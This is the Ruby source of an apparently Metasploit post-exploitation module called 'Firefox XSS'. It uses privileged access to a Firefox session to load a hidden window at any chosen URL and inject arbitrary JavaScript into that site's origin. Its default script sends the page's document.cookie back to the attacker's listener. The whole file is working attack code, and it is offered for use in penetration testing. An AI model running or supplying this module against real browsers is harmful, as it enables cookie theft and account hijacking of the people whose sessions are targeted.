metasploit-framework/modules/post/firefox/gather/xss.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'json'
require 'msf/core/payload/firefox'

class Metasploit3 < Msf::Post

  include Msf::Payload::Firefox
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Firefox XSS',
      'Description'   => %q{
        This module runs the provided SCRIPT as javascript in the
        origin of the provided URL. It works by navigating to a hidden
        ChromeWindow to the URL, then injecting the SCRIPT with Function().
        The callback "send(result)" is used to send data back to the listener.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'joev' ],
      'Platform'      => [ 'firefox' ]
    ))

    register_options([
      OptString.new('SCRIPT', [true, "The javascript command to run", 'send(document.cookie)']),
      OptPath.new('SCRIPTFILE', [false, "The javascript file to run"]),
      OptString.new('URL', [
        true, "URL to inject into", 'http://metasploit.com'
      ]),
      OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90])
    ], self.class)
  end

  def run
    results = js_exec(js_payload)
    if results.present?
      print_good results
    else
      print_error "No response received"
    end
  end

  def js_payload
    js = datastore['SCRIPT'].strip
    %Q|

      (function(send){
        #{set_timeout_source}

        var hiddenWindow = Components.classes["@mozilla.org/appshell/appShellService;1"]
                               .getService(Components.interfaces.nsIAppShellService)
                               .hiddenDOMWindow;

        hiddenWindow.location = 'about:blank';
        var src = (#{JSON.unparse({ :src => js })}).src;
        var key = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";

        hiddenWindow[key] = true;
        hiddenWindow.location = "#{datastore['URL']}";

        var evt = function() {
          if (hiddenWindow[key]) {
            setTimeout(evt, 200);
          } else {
            setTimeout(function(){
              try {
                send(hiddenWindow.wrappedJSObject.Function('send', src)(send));
              } catch (e) {
                send("Error: "+e.message);
              }
            }, 500);
          }
        };

        setTimeout(evt, 200);
      })(this.send);

    |.strip
  end
end